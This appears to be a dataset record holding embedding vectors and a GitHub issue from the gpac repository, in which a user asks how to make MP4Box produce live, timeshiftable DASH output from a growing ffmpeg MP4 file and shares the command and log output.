0.006422784179449081, -0.02068796567618847, 0.005429056007415056, 0.016421455889940262, 0.026090163737535477, -0.0016603703843429685, -0.007546963635832071, -0.012799527496099472, 0.0009639931959100068, 0.020749352872371674, 0.01798686571419239, 0.007293735630810261, -0.00010383309563621879, -0.011694531887769699, -0.014257507398724556, -0.003986423369497061, 0.024939127266407013, -0.0025130966678261757, 0.010390023700892925, 0.0069100563414394855, -0.0005966206663288176, -0.0009994835127145052, 0.019183943048119545, -0.02087213099002838, -0.004243488423526287, -0.016267985105514526, 0.0037370321806520224, 0.012039843015372753, 0.003907769452780485, 0.0030579206068068743, 0.011602449230849743, -0.02182365395128727, -0.008433261886239052, -0.006138862110674381, -0.013436433859169483, 0.0026070978492498398, -0.02056518755853176, -0.017480408772826195, -0.0023423596285283566, -0.0037811552174389362, 0.017802700400352478, -0.011188075877726078, -0.014833025634288788, -0.00022457203886006027, 0.023389063775539398, 0.016467496752738953, -0.013390392996370792, 0.006334538105875254, 0.004922599997371435, 0.0026339555624872446, -0.012162620201706886, -0.012032169848680496, -0.003974913153797388, -0.0045465948060154915, 0.009576625190675259, 0.0019989670254290104, 0.02650453709065914, 0.003194126533344388, 0.011886371299624443, 0.02068796567618847, 0.01933741569519043, -0.0037140115164220333, 0.02487773820757866, 0.016835829243063927, -0.022775178775191307, 0.011456651613116264, 0.003178779501467943, 0.0024382793344557285, 0.0025130966678261757, 0.0008023684495128691, 0.005298605188727379, 0.0007102855015546083, 0.01377407182008028, 0.023588577285408974, -0.00835652556270361, -0.0027298752684146166, -0.00197978294454515, -0.010750682093203068, -0.005287094973027706, 0.014249833300709724, -0.016881870105862617, 0.0007913376903161407, 0.002568730153143406, 0.0059431856498122215, -0.01916859671473503, 0.01170220598578453, 0.004669371992349625, 0.012738138437271118, -0.01488674059510231, -0.010681619867682457, 0.0011078728130087256, 0.0011730981059372425, 0.010904153808951378, -0.004051649011671543, -0.0045159002766013145, -0.0033571901731193066, 0.013781744986772537, 0.015700139105319977, 0.0010925255483016372, -0.0039327084086835384, 0.027640225365757942, 0.004270345903933048, 0.0404244065284729, -0.001358223264105618, 0.001551981084048748, -0.013559211045503616, 0.014433999545872211, 0.0024133401457220316, -0.0321369431912899, 0.018171031028032303, 0.024816349148750305, -0.004446838051080704, 0.013198553584516048, -0.0036890723276883364, -0.026212939992547035, -0.0028219581581652164, 0.00126038515008986, -0.014671879820525646, 0.014403305016458035, 0.018493322655558586, 0.0043432447127997875, -0.009875894524157047, 0.0071134064346551895, 0.009990997612476349, 0.009231314063072205, 0.004170589614659548, -0.004619493614882231, -0.013198553584516048, 0.00992960948497057, 0.011955433525145054, -0.03462318331003189, 0.004807496443390846, 0.0010886888485401869, 0.008402567356824875, -0.022498929873108864, 0.01167918462306261, 0.016728399321436882, -0.026074815541505814, -0.0016133696772158146, -0.008793920278549194, 0.013520843349397182, -0.0009256252669729292, 0.007312919478863478, 0.013950563967227936, 0.005862613208591938, 0.02340441197156906, 0.007105732802301645, 0.0022924812510609627, 0.00769276125356555, 0.01279185339808464, 0.009607318788766861, -0.002298236358910799, -0.014894413761794567, 0.0016421455657109618, -0.0056746103800833225, -0.03465387597680092, -0.003077104687690735, -0.021762266755104065, 0.009354091249406338, 0.011180402711033821, 0.02610551007091999, 0.004780638962984085, -0.009361764416098595, -0.006760421674698591, 0.004396960139274597, 0.0006992547423578799, -0.005824245512485504, 0.004665534943342209, -0.012799527496099472, 0.008724858053028584, -0.007896111346781254, 0.02064192295074463, 0.03548262268304825, 0.0023155019152909517, -0.011556407436728477, 0.016789788380265236, 0.025353500619530678, 0.005689957644790411, 0.028867999091744423, -0.02090282551944256, 0.02849966660141945, 0.011095993220806122, -0.008893676102161407, 0.0019481295021250844, -0.009223639965057373, -0.005797388032078743, -0.0037734818179160357, 0.0003414741950109601, -0.011295505799353123, 0.014756289310753345, -0.03689455986022949, -0.004055485595017672, -0.008210727944970131, -0.013520843349397182, 0.021409280598163605, 0.021378586068749428, -0.003967239521443844, -0.009223639965057373, -0.0061350250616669655, -0.0029332248959690332, 0.008594406768679619, 0.004654024727642536, -0.040485795587301254, -0.006725890561938286, -0.005551833193749189, -0.0017466980498284101, -0.002374972216784954, -0.004005607683211565, 0.006587766110897064, 0.011732899583876133, 0.0035509481094777584, 0.013282963074743748, -0.014464694075286388, -0.014917435124516487, 0.003130819648504257, -0.006656828336417675, -0.004673208575695753, -0.0028967754915356636, -0.01243886910378933, 0.012500258162617683, 0.02090282551944256, 0.0030406550504267216, 0.0021505202166736126, 0.006346048787236214, -0.01685117557644844, 0.0029006123077124357, -0.008279790170490742, -0.01763388141989708, 0.005912491586059332, -0.014457019977271557, -0.021363239735364914, -0.006599276792258024, 0.0014493470080196857, 0.003704419592395425, -0.012807200662791729, 0.0027567327488213778, 0.015232051722705364, -0.017495756968855858, -0.008801593445241451, -0.008893676102161407, -0.018002212047576904, -0.011272485367953777, -0.0015797978267073631, 0.015316460281610489, 0.010305614210665226, 0.0013687743339687586, -0.0011059544049203396, -0.012108905240893364, 0.008586733601987362, 0.015523646958172321, 0.002499667927622795, -0.002006640424951911, -0.010482107289135456, 0.008318157866597176, 0.01339806616306305, -0.01912255585193634, 0.007727292366325855, 0.029006123542785645, 0.0002999889256898314, -0.0035912343300879, 0.0038732383400201797, -0.02087213099002838, 0.010305614210665226, -0.04094620794057846, 0.009208292700350285, -0.025353500619530678, -0.013797092251479626, -0.0033092303201556206, 0.027164464816451073, 0.011142035014927387, 0.026397107169032097, -0.007489411626011133, 0.00019207924196962267, -0.011663838289678097, 0.015776874497532845, -0.0034607835114002228, 0.023373717442154884, 0.012047517113387585, -0.004001770634204149, 0.008893676102161407, 0.018953736871480942, 0.0031173909083008766, 0.0347459577023983, -0.0033303326927125454, -0.015147642232477665, 0.00145126529969275, 0.007873090915381908, 0.012784180231392384, 0.002808529417961836, 0.0051796650514006615, -0.0042588356882333755, 0.0036296022590249777, 0.006994465831667185, 0.019613664597272873, 0.0006426621112041175, 0.012646055780351162, 0.01571548730134964, -0.013950563967227936, -0.02082609012722969, 0.0031384932808578014, 0.0008829410071484745, 0.009921935386955738, -0.010413045063614845, -0.0035931526217609644, -0.013850807212293148, -0.012822547927498817, -0.028146682307124138, -0.01815568469464779, -0.007109569385647774, 0.0037715632934123278, 0.006073636468499899, -0.004216630943119526, 0.026243634521961212, 0.007896111346781254, 0.020749352872371674, 0.002279052510857582, -0.006495683453977108, 0.0005515383672900498, 0.012692097574472427, 0.009753117337822914, -0.03443901613354683, -0.02361927181482315, -0.022099902853369713, 0.004819006659090519, -0.006085147149860859, -0.006722053978592157, -0.0008167563937604427, 0.0026704049669206142, -0.014556776732206345, 0.008410240523517132, -0.014249833300709724, -0.02147066965699196, 0.021455323323607445, 0.004972478374838829, -0.007681251037865877, 0.0016929830890148878, 0.002445952733978629, -0.006737401243299246, 0.007259204518049955, -0.004834353923797607, 0.02357323095202446, -0.0016824319027364254, -0.03029528446495533, 0.005766693502664566, 0.004370102193206549, -0.009423153474926949, 0.011871024034917355, 0.0035471112933009863, -0.004032465163618326, 0.018477974459528923, 0.006062126252800226, 0.01235445961356163, -0.0026051795575767756, 0.014280527830123901, -0.00837954692542553, 0.0032363312784582376, 0.013221574015915394, 0.0014685308560729027, 0.023818785324692726, 0.006933077238500118, -0.001646941527724266, 0.017449716106057167, -0.010835091583430767, 0.016083817929029465, 0.006422784179449081, -0.006019921507686377, -0.009400132112205029, -0.01377407182008028, -0.013167859055101871, -0.002739467192441225, -0.0036296022590249777, 0.009476868435740471, 0.013635947369039059, 0.014349590055644512, -0.015500626526772976, 0.004723086953163147, 0.016206596046686172, -0.0027452223002910614, -0.011165055446326733, -0.022360805422067642, -0.006975281983613968, -0.01071998756378889, -0.012853242456912994, -0.008878328837454319, -0.0029236329719424248, -0.005060724448412657, -0.011671511456370354, -0.019352762028574944, -0.006664501968771219, 0.004673208575695753, 0.01767992228269577, 0.005406035576015711, 0.028515014797449112, 0.03330332785844803, 0.003681398928165436, -0.00011726185766747221, -0.01060488447546959, 0.023987602442502975, 0.0012632627040147781, 0.0017764332005754113, -0.01881561242043972, -0.00916992500424385, 0.02252962440252304, 0.0003155758895445615, 0.0158382635563612, -0.0032363312784582376, 0.013942890800535679, -0.009070168249309063, -0.01213192567229271, 0.00953825656324625, -0.0058472659438848495, 0.011387589387595654, 0.005693794693797827, 0.001089647994376719, -0.001524164341390133, -0.019659705460071564, -0.0075738211162388325, -0.008571386337280273, 0.006181066855788231, 0.008655795827507973, 0.01185567770153284, 0.03591234236955643, 0.020595882087945938, 0.01942949742078781, 0.0177720058709383, 0.019797829911112785, -0.0032286576461046934, 0.009361764416098595, 0.004220467526465654, 0.014802331104874611, 0.010535822249948978, 0.0021620304323732853, -0.002960082609206438, -0.026212939992547035, 0.013820112682878971, -0.009208292700350285, -0.004776801913976669, 0.011894045397639275, 0.02361927181482315, 0.0010570352897047997, -0.007635209709405899, -0.011157381348311901, 0.010067733936011791, 0.01784874126315117, 0.003126982832327485, -0.005751346237957478, -0.007754150312393904, 0.008440935052931309, 0.040792737156152725, 0.010182837024331093, 0.02222268097102642, 0.0009587176027707756, 0.014779310673475266, -0.014249833300709724, -0.03012646548449993, 0.02400295063853264, 0.007013649679720402, 0.00518350163474679, -0.002252195030450821, -0.011794288642704487, -0.0058664497919380665, -0.006369069218635559, 0.013973584398627281, 0.002716446528211236, 0.01837054453790188, -0.0015644505620002747, -0.024632183834910393, 0.003447354771196842, -0.0040861801244318485, -0.02012011967599392, -0.0011184238828718662, 0.004231978207826614, 0.002307828515768051, -0.00938478484749794, 0.005306278821080923, -0.009791485033929348, -0.01326761581003666, 0.008026561699807644, -0.0019011287949979305, 0.012638382613658905, -0.0032113920897245407, 0.0036660516634583473, 0.002158193616196513, -0.01798686571419239, -0.020549841225147247, 0.0027260384522378445, -0.012623035348951817, 0.006641481537371874, -0.014986497350037098, -0.0006968567613512278, 0.005935512017458677, -0.0010014019208028913, 0.0015471851220354438, -0.004489042796194553, -0.00739732850342989, -0.00404013879597187, -0.003681398928165436, 0.008371872827410698, -0.0031116358004510403, 0.01198612805455923, -0.005762856919318438, 0.013329003937542439, 0.0012680586660280824, -0.0018953736871480942, -0.02615155279636383, 0.002058437094092369, 0.017910130321979523, -0.0034281706903129816, 0.012738138437271118, 0.0009601563797332346, -0.004523573908954859, 0.017879435792565346, 0.040485795587301254, 0.017664575949311256, 0.006207924336194992, -0.0032497600186616182, -0.0012910794466733932, 0.004907252732664347, 0.004749944433569908, -0.017618533223867416, -0.011034604161977768, 0.0005093336803838611, 0.008180033415555954, -0.00007158009248087183, -0.01876956969499588, 0.007347450591623783, -0.00011036762589355931, 0.02558370679616928, -0.005574854090809822, 0.009377111680805683, 0.003077104687690735, 0.0021236625034362078, 0.004400796722620726, 0.022161291912198067, -0.02099490724503994, 0.01028259377926588, -0.010075407102704048, 0.009277354925870895, -0.02506190352141857, -0.010789049789309502, -0.03517568111419678, 0.007823212072253227, 0.013014387339353561, 0.004646351095288992, -0.01855470985174179, 0.011318527162075043, 0.006357559002935886, -0.03803025186061859, 0.00654939841479063, 0.016099166125059128, -0.006990629248321056, 0.009139230474829674, -0.010251899249851704, 0.011955433525145054, 0.02492377907037735, 0.0068640150129795074, 0.026212939992547035, -0.01200147531926632, 0.013597579672932625, -0.007124916650354862, -0.015654098242521286, 0.005947022698819637, -0.0013265697052702308, -0.007205489091575146, 0.009361764416098595, -0.03750844672322273, -0.020749352872371674, 0.008180033415555954, 0.0017351877177134156, 0.007021323312073946, 0.003579723881557584, -0.01746506243944168, 0.0028046926017850637, 0.014771636575460434, -0.002108315471559763, 0.008149338886141777, 0.0022368477657437325, -0.0008767062099650502, -0.0019164759432896972, 0.002954327268525958, -0.021547405049204826, -0.01728089712560177, 0.05739836022257805, -0.006062126252800226, 0.0247549619525671, -0.007293735630810261, 0.006184903439134359, 0.015370176173746586, -0.0023059099912643433, 0.003909687977284193, -0.0213478934019804, 0.018431933596730232, 0.00522570637986064, 0.0009783811401575804, 0.013167859055101871, -0.007873090915381908, -0.008824613876640797, -0.013129491358995438, 0.004481369163841009, -0.005329299718141556, -0.017956171184778214, -0.013758724555373192, -0.019460191950201988, 0.0014598980778828263, 0.02610551007091999, -0.015431564301252365, 0.00669135944917798, -0.005102929193526506, -0.014595144428312778, -0.00910086277872324, 0.009584298357367516, -0.011379915289580822, 0.024647530168294907, -0.019536929205060005, -0.009484541602432728, 0.0052141956984996796, 0.004615657031536102, 0.0017006566049531102, 0.012484910897910595, 0.008333505131304264, 0.004677045624703169, -0.015661772340536118, -0.004466021899133921, 0.016360066831111908, -0.007642883341759443, 0.013589905574917793, 0.016099166125059128, 0.009300376288592815, -0.012492584064602852, -0.012937651947140694, 0.006096657365560532, 0.004907252732664347, 0.0035567032173275948, 0.0017793107545003295, -0.0028910203836858273, 0.002518851775676012, -0.011602449230849743, 0.0032133106142282486, 0.008118645288050175, -0.00016486202366650105, 0.008218401111662388, -0.025246070697903633, -0.03186069428920746, -0.0213478934019804, -0.0025303622242063284, 0.0008570426725782454, -0.019659705460071564, -0.0009908507345244288, 0.01028259377926588, 0.02932841330766678, -0.020703312009572983, 0.020749352872371674, 0.0144493468105793, 0.005060724448412657, -0.004228141158819199, -0.010405370965600014, 0.005835755728185177, -0.015354828909039497, 0.0017994539812207222, -0.0025553014129400253, 0.0013754888204857707, -0.018738877028226852, -0.0019538847263902426, -0.00785774365067482, 0.005966206546872854, -0.014265180565416813, 0.0026799968909472227, -0.0007093262975104153, -0.010996236465871334, -0.02636641263961792, -0.0003853574744425714, 0.0316765271127224, -0.003687154036015272, 0.007328266743570566, -0.015370176173746586, 0.002639710670337081, 0.007094222586601973, -0.014196118339896202, -0.009093189612030983, -0.005398361943662167, 0.0036967459600418806, 0.019843870773911476, 0.0010733417002484202, 0.009668707847595215, -0.029620008543133736, 0.009108536876738071, -0.012461889535188675, -0.004308713600039482, 0.0050070094875991344, 0.0024843206629157066, -0.012937651947140694, -0.012093557976186275, 0.008893676102161407, -0.02099490724503994, -0.004020954482257366, 0.0001682192087173462, 0.006234781816601753, -0.00010689054033719003, 0.01990525983273983, 0.02269844152033329, 0.011755920946598053, 0.010037039406597614, 0.008563712239265442, -0.009799158200621605, 0.03493012487888336, 0.009123883210122585, 0.03090916946530342, -0.0007299490389414132, 0.004934110213071108, 0.018830958753824234, 0.007616025861352682, 0.03051014430820942, 0.009630340151488781, -0.012730465270578861, 0.026642661541700363, 0.008018888533115387, -0.005551833193749189, -0.0039135245606303215, -0.016866523772478104, 0.013566885143518448, 0.02148601785302162, 0.005409872159361839, -0.011471997946500778, 0.05150505155324936, 0.002027742797508836, 0.021639488637447357, -0.013144838623702526, 0.00019219913519918919, -0.0026013427414000034, -0.0023922377731651068, -0.012116579338908195, -0.01375105045735836, 0.015868958085775375, 0.00592783885076642, 0.020933520048856735, 0.016421455889940262, -0.003936545457690954, 0.013566885143518448, 0.011955433525145054, 0.018631447106599808, -0.010512800887227058, 0.003004205645993352, 0.0003196524630766362, 0.011556407436728477, 0.004937947262078524, 0.005582527723163366, 0.011226443573832512, 0.011211096309125423, -0.0016191249014809728, -0.014472367241978645, 0.027164464816451073, 0.013497822917997837, -0.02094886638224125, -0.010980889201164246, -0.004389286506921053, -0.011356894858181477, 0.015914998948574066, 0.01616055518388748, 0.006204087287187576, 0.01108831912279129, 0.005218032747507095, 0.0001227172906510532, 0.03232111036777496, -0.0017946579027920961, -0.006165719591081142, 0.01006005983799696, 0.017449716106057167, -0.005298605188727379, -0.014848372898995876, -0.025645095854997635, -0.0053408099338412285, 0.004761454649269581, 0.0009376152302138507, 0.0011999557027593255, 0.005290931556373835, 0.006963771767914295, -0.016620969399809837, 0.013559211045503616, 0.027839738875627518, -0.005501955281943083, 0.0068640150129795074, 0.004554268438369036, 0.009760790504515171, -0.027778349816799164, -0.010635578073561192, 0.0013035489246249199 ]
2,068
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hi, I'm trying to use mp4box to generate growing and timeshiftable dash output that can be played in browser (currently trying shaka/video.js). Application generating mp4 source is ffmpeg with empty_moov+omit_tfhd_offset+frag_keyframe+default_base_moof movflags set (25 frame GOP) and tried various other settings. Currently using node-gpac-dash to serve the dash content and a small node.js based webserver for the video.js/shaka test page. The result is playing back ok in chrome but mp4box doesn't seem to be handling the growing mp4 file, so the browser is never able to play beyond the duration of the clip at the time mp4box was run, I've seen suggestions to loop mp4box in shell script or similar eg. issue https://github.com/gpac/gpac/issues/835 but am not clear how to prevent it re-dashing media that was previously dashed or if there's a way to do this natively in mp4box or mp4box.js? This is the mp4box command (and output below): ./MP4Box -dash-live 1000 -frag 1000 -profile live -mpd-refresh 1000 -time-shift 7200 -out /opt/node-gpac-dash/dash.mpd /tmp/source.mp4 Live DASH-ing - press 'q' to quit, 's' to save context and quit [iso file] Box "tmcd" (start 1344) has 2 extra bytes [IsoMedia] Track 3 is disabled, ignoring track - you may retry by specifying alltk option [Dasher] No template assigned, using $File$_dash$FS$$Number$ [MPD] Generating MPD at time 2021-02-26T10:18:28.195Z [Dasher] Segment 1 duration 1.72 more than 3/2 DASH duration, consider reencoding or using segment timeline [Dasher] AS-1 Rep 1 segment 1 done 1601 ms before UTC due time [Dasher] updated period DID1 duration 1720 MPD time 1720 [Dasher] First CTS 43000 in segment 2 drifting by 0.72 (more than half a segment duration) from segment time, consider reencoding or using segment timeline [Dasher] updated period DID1 duration 1880 MPD time 1880 [Dasher] updated period DID1 duration 1920 MPD time 1920 [Dasher] updated period DID1 duration 1920 MPD time 1920 [MPD] Generating MPD at time 2021-02-26T10:18:28.338Z Slept for 1772 ms before generation, dash cumulated time 1963 Slept for 0 ms before generation, dash cumulated time 1965 Slept for 0 ms before generation, dash cumulated time 1966 etc. (it sleeps forever after this). In an ideal world I think it would be cleaner not to have to write dash media to the disk (to avoid having to housekeep etc) so wonder if I could use mp4box.js to avoid this step by passing boxes directly to browser over websockets but I think it may have a similar issue and in any case feels like we need to resolve the growing mp4 issue first. Any Help Appreciated! James
mp4box with growing .mp4 source
https://api.github.com/repos/gpac/gpac/issues/1692/comments
11
2021-02-26T10:48:05
2023-04-25T13:47:05Z
https://github.com/gpac/gpac/issues/1692
817,249,494
1,692
false
This is a GitHub Issue repo:gpac owner:gpac Title : mp4box with growing .mp4 source Issue date: --- start body --- Hi, I'm trying to use mp4box to generate growing and timeshiftable dash output that can be played in browser (currently trying shaka/video.js). Application generating mp4 source is ffmpeg with empty_moov+omit_tfhd_offset+frag_keyframe+default_base_moof movflags set (25 frame GOP) and tried various other settings. Currently using node-gpac-dash to serve the dash content and a small node.js based webserver for the video.js/shaka test page. The result is playing back ok in chrome but mp4box doesn't seem to be handling the growing mp4 file, so the browser is never able to play beyond the duration of the clip at the time mp4box was run, I've seen suggestions to loop mp4box in shell script or similar eg. issue https://github.com/gpac/gpac/issues/835 but am not clear how to prevent it re-dashing media that was previously dashed or if there's a way to do this natively in mp4box or mp4box.js? This is the mp4box command (and output below): ./MP4Box -dash-live 1000 -frag 1000 -profile live -mpd-refresh 1000 -time-shift 7200 -out /opt/node-gpac-dash/dash.mpd /tmp/source.mp4 Live DASH-ing - press 'q' to quit, 's' to save context and quit [iso file] Box "tmcd" (start 1344) has 2 extra bytes [IsoMedia] Track 3 is disabled, ignoring track - you may retry by specifying alltk option [Dasher] No template assigned, using $File$_dash$FS$$Number$ [MPD] Generating MPD at time 2021-02-26T10:18:28.195Z [Dasher] Segment 1 duration 1.72 more than 3/2 DASH duration, consider reencoding or using segment timeline [Dasher] AS-1 Rep 1 segment 1 done 1601 ms before UTC due time [Dasher] updated period DID1 duration 1720 MPD time 1720 [Dasher] First CTS 43000 in segment 2 drifting by 0.72 (more than half a segment duration) from segment time, consider reencoding or using segment timeline [Dasher] updated period DID1 duration 1880 MPD time 1880 [Dasher] updated period DID1 duration 1920 MPD time 1920 [Dasher] updated period DID1 duration 1920 MPD time 1920 [MPD] Generating MPD at time 2021-02-26T10:18:28.338Z Slept for 1772 ms before generation, dash cumulated time 1963 Slept for 0 ms before generation, dash cumulated time 1965 Slept for 0 ms before generation, dash cumulated time 1966 etc. (it sleeps forever after this). In an ideal world I think it would be cleaner not to have to write dash media to the disk (to avoid having to housekeep etc) so wonder if I could use mp4box.js to avoid this step by passing boxes directly to browser over websockets but I think it may have a similar issue and in any case feels like we need to resolve the growing mp4 issue first. Any Help Appreciated! James --- end body ---
2,786
[ -0.04581455513834953, 0.01461790595203638, -0.020483583211898804, 0.007338407915085554, -0.0016915366286411881, -0.00693445885553956, -0.021139999851584435, 0.049315445125103, -0.025819076225161552, 0.027771497145295143, 0.023950811475515366, 0.01428128220140934, -0.0038038536440581083, -0.02381616272032261, -0.005003077443689108, 0.03497525677084923, -0.0021291482262313366, 0.02105584368109703, 0.005028324201703072, 0.008323033340275288, 0.016301026567816734, 0.004729569889605045, -0.03840882331132889, 0.04554525390267372, -0.019204411655664444, 0.028444744646549225, -0.01514808926731348, 0.007241628132760525, -0.025213154032826424, 0.02273896522819996, 0.011773431673645973, 0.03261888399720192, -0.01720149628818035, 0.037028662860393524, 0.03712965175509453, 0.009568543173372746, 0.06974853575229645, 0.04386213421821594, -0.01481146551668644, -0.03803853690624237, -0.00044813097338192165, -0.022452834993600845, -0.04217901453375816, 0.031238727271556854, -0.011150676757097244, 0.03622076287865639, -0.030228853225708008, 0.0011960678966715932, -0.007877006195485592, -0.033830732107162476, 0.007969577796757221, -0.016696561127901077, -0.031019920483231544, -0.03955334424972534, -0.01526590809226036, -0.06476649641990662, 0.04806993529200554, 0.002059719292446971, 0.013582786545157433, 0.01864898018538952, 0.01558570098131895, -0.017319316044449806, 0.0014432762982323766, 0.04766598716378212, 0.021173663437366486, -0.0015631986316293478, -0.017571784555912018, 0.026525987312197685, -0.04254930093884468, 0.03527821600437164, -0.0014695751015096903, -0.02085386961698532, 0.020130127668380737, 0.01577926054596901, 0.04103448987007141, -0.05042630806565285, 0.03675936162471771, 0.03766825050115585, 0.0010661520063877106, 0.007456226274371147, -0.05672118067741394, 0.01908659189939499, -0.04743035137653351, 0.011933328583836555, 0.01663765124976635, -0.006143391598016024, -0.021123168990015984, -0.0645308569073677, -0.006484223995357752, -0.022015223279595375, 0.008453475311398506, 0.023311225697398186, 0.04140477627515793, -0.021745923906564713, 0.005015700589865446, 0.03154168650507927, -0.03669203817844391, -0.005571130663156509, -0.046487804502248764, -0.04689175263047218, -0.02169542945921421, -0.010830883868038654, 0.0046285828575491905, -0.010797221213579178, 0.01354070845991373, 0.0023248109500855207, 0.01418871060013771, -0.03150802478194237, -0.001803043414838612, 0.09250432997941971, 0.03463863208889961, 0.011933328583836555, -0.012051146477460861, 0.029084332287311554, -0.047396689653396606, 0.024556735530495644, -0.0005117739783599973, -0.06274675577878952, -0.011983822099864483, 0.023479538038372993, 0.010443765670061111, -0.002354265656322241, -0.018547993153333664, 0.05029165744781494, -0.00965269934386015, 0.04965206980705261, -0.04063054174184799, -0.008503968827426434, 0.005924586206674576, -0.021611273288726807, -0.06480015814304352, 0.003721801331266761, -0.00338096939958632, -0.040731530636548996, 0.01673022285103798, 0.01322091557085514, -0.030565477907657623, 0.023041926324367523, -0.02938729338347912, 0.02788931503891945, 0.0016662898706272244, -0.04160675033926964, 0.053792547434568405, 0.021106338128447533, -0.007510927505791187, 0.00740573275834322, 0.011462054215371609, 0.0038248924538493156, -0.022486496716737747, 0.019642023369669914, 0.009585374034941196, -0.023715175688266754, -0.0030422413256019354, 0.022688470780849457, 0.02704775519669056, 0.01893511228263378, -0.03675936162471771, -0.010670986957848072, -0.0013927826657891273, -0.010511090978980064, -0.01448325626552105, -0.035311877727508545, 0.00978734903037548, 0.011192754842340946, -0.03820684924721718, -0.042212676256895065, 0.035749491304159164, -0.0038816980086266994, -0.00419517932459712, 0.003799645695835352, -0.0034125279635190964, -0.021644936874508858, 0.0025899026077240705, 0.029976386576890945, -0.026307182386517525, -0.02166176773607731, 0.024102292954921722, 0.011563041247427464, 0.002158602699637413, 0.012211043387651443, -0.02639133855700493, 0.0017157314578071237, -0.000964112754445523, 0.005693156737834215, 0.006917627528309822, -0.009257165715098381, 0.023933980613946915, -0.03172682970762253, 0.024371592327952385, -0.03155852109193802, 0.017521290108561516, 0.02770417183637619, 0.00892054196447134, -0.02921898104250431, 0.03250106796622276, 0.007830720394849777, -0.03968799486756325, -0.039587005972862244, -0.0056468709371984005, 0.0193390604108572, -0.0058067673817276955, -0.05345592275261879, -0.014996608719229698, -0.027855653315782547, -0.05089757964015007, 0.004066841211169958, -0.005731027107685804, 0.028932850807905197, 0.023260733112692833, -0.036153439432382584, -0.004312997683882713, -0.04110181704163551, 0.004485517740249634, 0.00740152457728982, -0.021813249215483665, 0.006719860713928938, -0.01191649679094553, 0.029033837839961052, -0.01868264377117157, -0.028916019946336746, -0.0022932523861527443, -0.0032883977983146906, 0.004729569889605045, -0.02666063793003559, -0.00839035864919424, -0.028040796518325806, -0.0063664051704108715, 0.00022196158533915877, -0.025061672553420067, 0.017992563545703888, 0.04749767482280731, 0.05167181417346001, 0.006071859039366245, 0.012177380733191967, -0.005019908305257559, 0.03004371002316475, 0.0016799651784822345, -0.0025057464372366667, 0.018749969080090523, -0.0013643800048157573, 0.0008815346518531442, 0.02662697434425354, -0.010906624607741833, 0.011403145268559456, 0.02082020789384842, 0.04160675033926964, -0.0038185808807611465, 0.01405406091362238, -0.02406863123178482, -0.016174793243408203, -0.004506556782871485, -0.01785791479051113, -0.00012958717707078904, -0.028209108859300613, -0.008478722535073757, 0.022621147334575653, 0.024438917636871338, 0.018177706748247147, -0.006753523368388414, -0.03797120973467827, 0.006913419812917709, -0.020786544308066368, -0.025482453405857086, -0.00009645072714192793, 0.013321902602910995, -0.04709372669458389, -0.002779253525659442, 0.020029140636324883, 0.007940123789012432, -0.0027287600096315145, -0.018968774005770683, -0.028680382296442986, -0.00693445885553956, -0.0032757744193077087, -0.018564825877547264, 0.0003111144178546965, 0.00011084930156357586, -0.01844700612127781, 0.03628809005022049, 0.018766799941658974, 0.0019250697223469615, 0.04419875890016556, 0.017024768516421318, 0.02063506469130516, -0.03635541349649429, 0.016486169770359993, 0.002669850829988718, 0.004876843187958002, -0.032770365476608276, 0.004754817113280296, 0.01461790595203638, 0.012269952334463596, 0.009593789465725422, 0.04335719719529152, 0.039822645485401154, 0.008937372826039791, -0.014836711809039116, 0.022015223279595375, 0.027855653315782547, 0.0225201603025198, -0.022671639919281006, 0.028007134795188904, -0.0012770680477842689, -0.01888461783528328, -0.01999547705054283, -0.014895620755851269, -0.029067499563097954, 0.0091477632522583, -0.008668073453009129, -0.003500891849398613, 0.04278493672609329, -0.02938729338347912, -0.01866581290960312, 0.004868427757173777, -0.003096942789852619, 0.0031600596848875284, 0.04036124423146248, -0.016503002494573593, -0.017319316044449806, -0.006278041284531355, -0.0013128344435244799, -0.018127214163541794, -0.05180646479129791, 0.012859044596552849, 0.009610621258616447, -0.031676337122917175, -0.04238098859786987, 0.0004326147027313709, -0.047396689653396606, 0.03285452350974083, 0.0031895143911242485, -0.03031300939619541, 0.03931770846247673, -0.04406410828232765, 0.012699148617684841, -0.04110181704163551, -0.027805158868432045, -0.00023024569964036345, 0.015939155593514442, 0.006568379700183868, -0.029319968074560165, -0.0037407365161925554, 0.03622076287865639, -0.015013439580798149, 0.011209585703909397, -0.015307986177504063, -0.023698344826698303, 0.019642023369669914, 0.02852890081703663, -0.031440701335668564, 0.0012055354891344905, 0.00204078434035182, 0.0009977752342820168, 0.011007611639797688, 0.021005351096391678, 0.0004936278564855456, -0.016444092616438866, -0.012042731046676636, 0.0012623408110812306, 0.0038753862027078867, -0.0035640087444335222, -0.02401813678443432, -0.008095812052488327, 0.034672293812036514, 0.01029228512197733, -0.013372397050261497, -0.05254703760147095, -0.02703092433512211, -0.00702703045681119, 0.01363328006118536, -0.0161242987960577, 0.031676337122917175, -0.03450398147106171, 0.03625442832708359, -0.014340191148221493, -0.0010587882716208696, 0.019254904240369797, 0.001710471697151661, -0.017740095034241676, 0.012530836276710033, -0.04103448987007141, 0.04096716642379761, 0.03776923567056656, -0.026525987312197685, -0.002228031400591135, 0.017066847532987595, -0.0002378723438596353, 0.028646720573306084, -0.027317054569721222, -0.008996281772851944, -0.034015875309705734, 0.00011196699779247865, -0.05281633883714676, -0.03827417269349098, -0.01844700612127781, 0.026307182386517525, -0.007771811448037624, -0.031003089621663094, -0.022250860929489136, -0.028394252061843872, 0.04419875890016556, -0.01785791479051113, 0.009088853374123573, 0.04655512794852257, -0.013246162794530392, 0.039856307208538055, -0.021644936874508858, -0.004990453831851482, 0.0038669705390930176, -0.01848066970705986, 0.010696234181523323, -0.006993367802351713, 0.002115472685545683, -0.008870047517120838, 0.03672569990158081, 0.009156178683042526, 0.007603499107062817, 0.0101997135207057, -0.03827417269349098, 0.01492086797952652, -0.012135302647948265, -0.03174366429448128, -0.0033851771149784327, -0.019911322742700577, 0.008562878705561161, 0.005263960920274258, -0.02061823196709156, 0.006686198525130749, 0.01247192732989788, -0.03696133941411972, 0.014744140207767487, -0.02058457024395466, -0.010149220004677773, -0.052950989454984665, 0.0027497990522533655, -0.003368346020579338, -0.038307834416627884, -0.019221242517232895, -0.03968799486756325, -0.00976210180670023, -0.047396689653396606, 0.024994347244501114, 0.013170422054827213, 0.010342778638005257, 0.04170773923397064, -0.039822645485401154, -0.038543470203876495, -0.02770417183637619, 0.014643153175711632, -0.010527921840548515, 0.013145175762474537, 0.04924812167882919, 0.004977830685675144, 0.00839035864919424, -0.018733136355876923, -0.016587158665060997, -0.030599139630794525, -0.01908659189939499, 0.013717436231672764, -0.00027350717573426664, 0.02188057266175747, 0.012774888426065445, 